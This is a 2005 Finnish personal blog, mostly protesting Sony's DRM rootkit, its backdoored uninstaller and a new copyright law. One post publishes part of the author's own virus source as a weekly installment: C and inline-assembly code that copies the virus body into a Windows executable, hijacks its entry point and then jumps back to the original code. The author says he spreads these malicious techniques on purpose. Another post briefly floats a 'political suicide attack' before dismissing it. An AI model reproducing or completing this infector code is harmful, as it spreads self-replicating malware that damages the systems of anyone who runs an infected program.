IRC-Galleria

WheeMaanantai 14.11.2005 19:23

Sysinternalsin Mark linkkasi juttuuni sony-uninstall-rebootista blogissaan, siellä on mun nimikin: http://www.sysinternals.com/blog/2005/11/sony-no-more-rootkit-for-now.html

boingboingSunnuntai 13.11.2005 21:08

Whee. Juttuni sony-uninstaller-kämmistä pääsi boingboingiin :)

Sonyn uninstalleri on takaovi!Sunnuntai 13.11.2005 07:28

Jaahas jaahas! Jos olet uninstalloinut sonyn rootkitin, koneellasi on takaovi jota voi ihan www-sivujen kautta hyväksikäyttää, esim vaikka koneesi boottaamiseen mitään sinulta kysymättä!

Lisää faktaa, ja demonstraatio:
http://hack.fi/~muzzy/sony-drm/

Päivän viruspläjäysSunnuntai 13.11.2005 05:11

Jäi nyt vähän myöhäiselle tälle viikolle, mutta parempi myöhään kuin ei milloinkaan.

Tälläkertaa esittelyssä on toinen saastuttajafunktioista. Aiemminhan tuli nähtyä funktio joka allokoi uuden sectionin (ja joka muuten sisältää kriittisen heikkouden ettei sitä voi käyttää oikeassa viruksessa, parempi etten korjaa). Tälläkertaa näytän funktion joka kopioi itse viruksen kohteeseen, eli tekee itse saastutus-osuuden:

#define ENTRYWRITE_MAGIC 0x434
#define VIRUSENTRY_MAGIC 0x2C0

inline void bar(char *base, unsigned int fsize)
{
unsigned int attacksize = 0x1000;
unsigned int virus;
__asm {
call blehbleh
blehbleh:
pop eax
mov virus, eax
}
virus = (virus/0x1000)*0x1000;
mmove(base+fsize, (char*)virus, attacksize);

pe::dos_header *dosh = reinterpret_cast<pe::dos_header*>(base);
pe::nt_header32 *peh = reinterpret_cast<pe::nt_header32*>(base+dosh->e_lfanew);

*(unsigned int*)(base+fsize+ENTRYWRITE_MAGIC) = peh->optional_header.image_base + peh->optional_header.address_of_entrypoint;

pe::section_header* sections = reinterpret_cast<pe::section_header*>
(base+dosh->e_lfanew+peh->file_header.size_of_optional_header + 20+4); // fileheader+signature = 20+4

pe::section_header *v = sections + peh->file_header.number_of_sections-1;

peh->optional_header.address_of_entrypoint = v->virtual_address+VIRUSENTRY_MAGIC;
}

Alussa oleva pätkä assembleria siis käyttää call/pop menetelmää EIP-rekisterin lukemiseksi, tämän jälkeen otetaan 0x1000:lla jaollinen osuus eli sama granulariteetti kuin aiemmassa section-allokaattorissa. Tällä pitäisi löytyä pohjaosoite virukseen, koska EIP osoittaa aina jonnekin tämän blokin sisälle. mmove() on simppeli memmove-klooni. Piti toteuttaa itse, kun memmove olisi generoinut MoveMemory apikutsun, ja oikeita funktiokutsuja ei tässä viruksessa voinut käyttää... Tässä nyt täydellisyyden vuoksi vielä se mmovekin:

inline void mmove(char*dest, char*src, unsigned int size)
{
if (dest>src)
for(;size;--size)
dest[size-1] = src[size-1];
else
for(unsigned int i=0;i<size;++i)
dest = src;
}

Ylemmässä bar()-funktiossa ei ole juurikaan sen erikoisempaa, definatut magic-arvot määrittävät missä kohtaa virusta on oikea entrypointti ja missä kohtaa on viruksen pääfunktion loppu, josta löytyy assypätkä:

__asm {
push 0x12345678
ret
}

Tätä käytetään alkuperäiseen entrypointtiin hyppäämiseen, jotta saastunut ohjelma saa ajovuon haltuunsa kun virus on tehnyt oman työnsä. Ensikerralla sitten ehkä saastuttajamekanismin pääfunktio.

Ja mainittakoon vielä että tätä tietotaitoa levitän, koska tekijänoikeus on antamassa kaikille taiteilijoille oikeuden suojata tekeleitään keinoja kaitamatta. Tarkoitus hyvittää keinot, joten olisi epäreilua jos pienet artistit eivät osaisi tehokkaita haittatekniikoita.

blogaamistoleranssiPerjantai 11.11.2005 13:51

Heräsin ja pohdin, mikä mahtaa olla raja asioille joista blogaa. Koska olen tätä kirjoittamassa, on raja ilmeisen matala. Hykertelen kun ajattelen, että kaikille kavereilleni tulee etusivulle ilmoitus blogistani. Oppivat varmaan hyvin pian dismissaamaan ne lukematta mitä sanottavaa minulla on (tai ei ole) :)

Miekkamiehen tie on vaikea ja vaivalloinenPerjantai 11.11.2005 04:28

Yritän metsästää hyttystä miekalla. Siihen on hyvin vaikea osua. Pieni koristeellinen kodachia jäljittelevä lelumiekkani ei leikkaa juuri mitään paitsi ehkä ilmaa, jos sitäkään. Joskus aiemmin taistelin tällä pöytätuuletintani vastaan, ja tuolloin tajusin että kaikkia taisteluja ei mitenkään vain voi voittaa. Tuuletin vain puhalsi ja puhalsi, mutten voinut leikata tuulta. Leikkasin ilmaa miten tahansa, se yhä vain puhalsi. Niin se vain on, että jotkin aseet ovat tehottomia joitain asioita vastaan.

Ja se hyttynen senkun väistelee miekkani sivallukset. Tilastollisesti katsoen siihen pitäisi ennenpitkää osua, viimeistään äärettömän määrän sivalluksia jälkeen. Ja sitten kun käyn purkamaan tätä kärsimystäni koneelle, tuo ninjahyttynen piiloutuu ja pyörii nyt jossain tietoisuuteni tavoittamattomissa. Oikea samurai ei olisi jättänyt taisteluaan kesken whinetäkseen päiväkirjalleen. Aina voi hävitä.

muzzy - hyttynen, 0-1

VäsyttääTorstai 10.11.2005 20:19

Näinä päivinä on tullut nukuttua paljon ja tehtyä vähän. Mistään ei tunnu tulevan mitään. Mistään ei tunnu olevan myöskään hyötyä, kun uusi maailmanjärjestys puskee päälle jossa rikkaat voivat ostaa köyhien ihmisoikeuksia.

Aiemmin päivällä pohdin mitä tässä olisi enää tehtävissä, että suunta muuttuisi. Tanja Karpela oli sitten joko tarkoituksella tai täyttä vihjeettömyyttään johtanut harhaan eduskuntaa lain käsittelyn aikana väittäessään että olisi "mustaa valkoisella" siitä mitä direktiivi tarkoittaa. Nyt sitten on selvinnyt että näin ei ollut, mitään tälläisiä asiakirjoja ei ollut olemassa, vain direktiivi ja sen esityöt. Lakia kun ajettiin läpi, annettiin kuva että mitään ei ole tehtävissä ja jos yrittää jotain niin siitä vain kärsii. Esitettiin, että EU tulee jakelemaan sakkoja mikäli direktiivin toteuttaa "väärin" tai viivästyttää sen toteuttamista. Puoluekuri piti huolen lopusta, missä oli demokratia kun tämä näytelmä näyteltiin?

Päädyin tulokseen, että tässä tarvittaisiin jotain radikaalia, järkyttävää, shokeeraavaa. Jos se että laki on ajettu läpi harhaanjohtamalla ja väärällä tiedolla ei ole järkyttävää, tai että laki olisi suojaamassa haittaohjelmia ja kuluttajien omaisuuden haltuunottoa monikansallisten teosten oikeudenomistajien taholta, mikä sitten? Ehkäpä poliittinen itsemurha-isku? Taitaa jäädä minun osaltani tekemättä, mutta onko tässä mitään lievemmän tasoista enää tehtävissä? Jos shokeeraa jollain rikollisella toiminnalla, jää viesti kuulematta ja painotutaan siihen rikollisuuteen. Sen pitäisi olla laillista ja koskettavaa. Koska tosiasiat eivät teknisestä luonteestaan johtuen kosketa kansaa ja addressit jätetään ottamatta vastaan (audienssia ei saatu masinointi.org:n addressille), mielenosoituksissa esitetään väärin mielenosoittajien näkemykset ("tahtovat musiikkia ilmaiseksi sananvapauden verukkeella"), ovat vaihtoehtot tosiaankin vähissä.

Mikä on hallintomuodon nimi, jossa päätöksiä tekevät isot monikansalliset yritykset?

Sonyn uninstalleriTorstai 10.11.2005 00:08

Tämä Sonyn rootkit nostaa verenpainetta taas kertaalleen, kun Mark blogasi näiden uninstallerista: http://www.sysinternals.com/blog/2005/11/sony-you-dont-reeeeaaaally-want-to_09.html

Tiivistettynä siis:
- Joudut useampaan kertaan sanomaan että haluat uninstalloida
- Jokainen uninstall-pyyntö menee Sonyn customer servicen kautta, kestää päivä käsitellä
- Uninstalleri on konekohtainen, sitä ei voi jakaa kaverille tai edes toiselle omalle koneelleen
- Uninstalleri on vaikea löytää Sonyn sivuilta
- Se lähettää sonylle jotain tietoa käyttämästäsi tietokoneesta
- Vaatii että asennat ylimääräisen ActiveX-komponentin, joka ilmeisesti jää aktiiviseksi järjestelmään DRM-roskan uninstallaamisen jälkeenkin
- Asiakkaan on vaikea tietää että mistä ongelmat edes johtuvat, kun ei tiedä joutuneensa tämän malwaren uhriksi

Verenpaine nousee. En saa analysoiduksi tätä roskaa lainkaan kun pistää vihaksi jatkuvasti. Olen epäuskon ja shokin vallassa aina tasaisin väliajoin kun uutta tietoa Sonyn käytöksestä tulee ilmi, tämä menee pitkälle yli peloistani sen suhteen mitä käy uuden tekijänoikeuslain voimaantullessa, eikä se ole vielä edes voimassa! Vuoden alusta näillä haittaohjelmilla on nimittäin implisiittisesti lain suojaama asema. Mikäli kerran suojausohjelmia ei saa kiertää, niin onhan se selvä että niitä saa silloin tehdä ja käyttää...

Olen sanonut sen moneen kertaan ja sanon uudestaan, uuden lain henki tuntuu olevan "Tarkoitus pyhittää keinot" -- pitäisi kai tehdä cd-levy joka varastaa käyttäjän nettipankista rahaa, ja piilottaa tämä tieto jotenkin käyttöehtoihin niin että käyttäjä hyväksyy sen että teos hoitaa itse käyttömaksujen suorittamisen. Ei pitäisi olla ongelma kenellekään?

PolitiikkaaKeskiviikko 09.11.2005 12:13

Kun minun asioistani päättävät minua tyhmemmät ihmiset, pitäisi melkein ruveta itse aktiiviseksi politiikassa. Sinänsä harmittavaa, ettei se homma muuten juuri kiinnosta, ja siinä on omat hämärät protokollansa miten asiat toimivat. Näitä pitäisi opetella jonkinverran ymmärtämään.

On nyt jäänyt kaikenlainen muu taustalle, olen unohtanut virus-lähdekoodienkin julkaisun täällä päiväkirjassa vaikka tarkoituksena oli julkaista kerran viikossa. No, katsotaan josko myöhemmin tänään tai huomenna tms.

Sonyn rootkitTorstai 03.11.2005 06:50

Sony sitten pisti levyynsä kopiosuojauksen jossa kovin kieroja piirteitä. Koittaa piilottaa olemassaoloaan rootkitillä, soittaa kotiin ja kertoo kun käyttäjä kuuntelee levyä, jne jne...

Sitten kun siitä nousi kohu, julkaisevat päivityksen joka poistaa tämän piilotus-ominaisuuden, muu paha toki pysyy. Sitä ei yhäkään saa helposti pois, ja suoraviivainen poisto rikkoo CD-aseman ajurit. Ja se ilmeisesti yhä kertoo sonymusicille kun soitat levyä.